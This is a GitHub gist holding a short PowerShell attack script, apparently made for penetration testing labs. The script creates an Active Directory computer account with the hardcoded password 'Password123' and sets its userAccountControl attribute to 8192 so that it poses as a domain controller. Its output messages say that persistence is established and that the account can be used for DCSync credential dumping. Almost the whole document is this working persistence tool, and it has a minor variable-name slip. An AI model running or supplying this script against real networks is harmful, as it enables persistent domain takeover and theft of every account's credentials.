Skip to content

Instantly share code, notes, and snippets.

@netbiosX
Created January 17, 2022 11:24
Show Gist options
  • Star 8 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
  • Save netbiosX/089a9d97a4f60016a6935500f328c17c to your computer and use it in GitHub Desktop.
Save netbiosX/089a9d97a4f60016a6935500f328c17c to your computer and use it in GitHub Desktop.
PowerShell script to automate domain persistence via the userAccountControl active directory attribute.
function Execute-userAccountControl
{
[CmdletBinding()]
param
(
[System.String]$DomainFQDN = $ENV:USERDNSDOMAIN,
[System.String]$ComputerName = 'Pentestlab',
[System.String]$OSVersion = '10.0 (18363)',
[System.String]$OS = 'Windows 10 Enterprise',
[System.String]$DNSName = "$ComputerName.$DomainFQDN",
$MachineAccount = 'Pentestlab'
)
$secureString = convertto-securestring "Password123" -asplaintext -force
$VerbosePreference = "Continue"
Write-Verbose -Message "Creating Computer Account: $ComputerName"
New-ADComputer $ComputerName -AccountPassword $securestring -Enabled $true -OperatingSystem $OS -OperatingSystemVersion $OS_Version -DNSHostName
$DNSName -ErrorAction Stop;
Write-Verbose -Message "$ComputerName created!"
Write-Verbose -Message "Attempting to establish persistence."
Write-Verbose -Message "Changing the userAccountControl attribute of $MachineAccount computer to 8192."
Set-ADComputer $MachineAccount -replace @{ "userAccountcontrol" = 8192 };
Write-Verbose -Message "$MachineAccount is now a Domain Controller!"
Write-Verbose -Message "Domain persistence established!You can now use the DCSync technique with Pentestlab credentials."
$VerbosePreference = "Continue"
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment